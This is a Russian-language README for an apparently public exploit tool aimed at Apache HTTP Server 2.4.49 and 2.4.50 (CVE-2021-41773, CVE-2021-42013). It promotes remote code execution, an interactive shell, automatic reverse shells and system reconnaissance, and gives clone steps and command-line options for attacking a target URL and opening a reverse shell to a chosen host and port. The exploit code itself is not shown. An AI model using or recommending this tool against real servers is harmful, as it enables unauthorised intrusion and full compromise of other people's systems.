
Мощный и надежный инструмент эксплуатации уязвимостей Apache HTTP Server CVE-2021-41773 и CVE-2021-42013. Этот инструмент предоставляет возможность удаленного выполнения кода на уязвимых серверах Apache 2.4.49 и 2.4.50.
Этот эксплойт нацелен на уязвимости path traversal и удаленного выполнения кода в Apache HTTP Server версий 2.4.49 и 2.4.50. Инструмент использует curl в качестве бэкенда для обхода проблем с кодировкой URL, которые затрагивают другие попытки эксплуатации на основе Python, обеспечивая надежную эксплуатацию, даже когда другие инструменты терпят неудачу.
⚡ Возможности 🔧 Поддержка нескольких полезных нагрузок: тестирует различные пути и техники эксплуатации
💻 Интерактивная оболочка: полное интерактивное выполнение команд с автодополнением
🔄 Автоматический reverse shell: автоматическая генерация reverse shell с несколькими типами полезных нагрузок
🔍 Системная разведка: быстрый сбор и перечисление системной информации
🚀 Бэкенд curl: обходит ограничения кодировки URL, которые ломают другие инструменты
🖥️ Кроссплатформенность: работает на Linux, Windows и macOS
📦 Нет зависимостей: использует только встроенные библиотеки Python и системные инструменты
🎯 Умное обнаружение: автоматически определяет версию Apache и статус уязвимости
CVE-2021-41773
Затронутые версии: Apache 2.4.49
Описание: Уязвимость Path Traversal, позволяющая получить доступ к файлам вне корневого каталога веб-сервера
Оценка CVSS: 7.5 (Высокая)
Воздействие: Раскрытие информации, ограниченный доступ к файлам
CVE-2021-42013
Затронутые версии: Apache 2.4.50
Описание: Уязвимость удаленного выполнения кода при включенном CGI
Оценка CVSS: 9.8 (Критическая)
Воздействие: Полная компрометация системы, выполнение произвольных команд
git clone https://github.com/FakhriCRD/apache-cve-2021-42013-exploit.git
cd apache-cve-2021-42013-exploit
chmod +x exploit.py
curl --version
Требования
Python 3.6+
curl (системная команда)
netcat (для функциональности reverse shell)
Базовый синтаксис bash
python3 apache_exploit.py -u <TARGET_URL> [OPTIONS]
Options
Опция Описание Пример
-u, --url Целевой URL (обязательно) -u http://target.com
-c, --command Выполнить одиночную команду -c "whoami"
-i, --interactive Запустить интерактивную оболочку -i
-r, --reverse Автоматически сгенерировать reverse shell -r
-s, --scan Выполнить системную разведку -s
-lh, --lhost Локальный IP для reverse shell -lh 192.168.1.100
-lp, --lport Локальный порт для reverse shell -lp 4444